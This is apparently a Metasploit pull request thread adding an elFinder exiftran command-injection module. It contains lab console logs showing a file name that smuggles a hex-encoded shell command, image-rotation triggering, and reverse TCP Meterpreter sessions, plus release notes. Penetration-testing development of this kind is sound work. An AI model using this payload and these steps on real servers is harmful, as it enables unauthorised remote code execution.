Add elFinder PHP Connector exiftran Command Injection

[bcoles]

Add elFinder PHP Connector exiftran Command Injection exploit module. Fixes #11539

msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
rhosts => 172.16.191.253
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
verbose => true
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
[*] 172.16.191.253:80 - The target service is running, but could not be validated.
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
[*] Sending stage (38247 bytes) to 172.16.191.253
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
[!] Tried to delete .kPUXqhMZ.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter > 

[space-r7]

Tested v2.1.47 on Ubuntu:

msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.215.167
rhosts => 172.16.215.167
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Uploading payload 'foK272.jpg;echo 6370202e2e2f66696c65732f666f4b3237322e6a70672a6563686f2a202e33486c323733722e706870 |xxd -r -p |sh& #.jpg' (1853 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.3Hl273r.php) ...
[*] Sending stage (38247 bytes) to 172.16.215.167
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.167:57360) at 2019-03-11 12:28:41 -0500
[!] Tried to delete .3Hl273r.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64
Meterpreter : php/linux

Code looks good to me, so I can land this soon.

[space-r7]

Release Notes

The unix/webapp/elfinder_php_connector_exiftran_cmd_injection exploit module has been added to the framework. This exploits a command injection vulnerability in elFinder versions < 2.1.48. elFinder allows for resizing and rotating images by passing the image file data, including unsanitized file names to the exiftran utility. Code execution can be achieved when performing an image operation on a file whose name contains shell commands.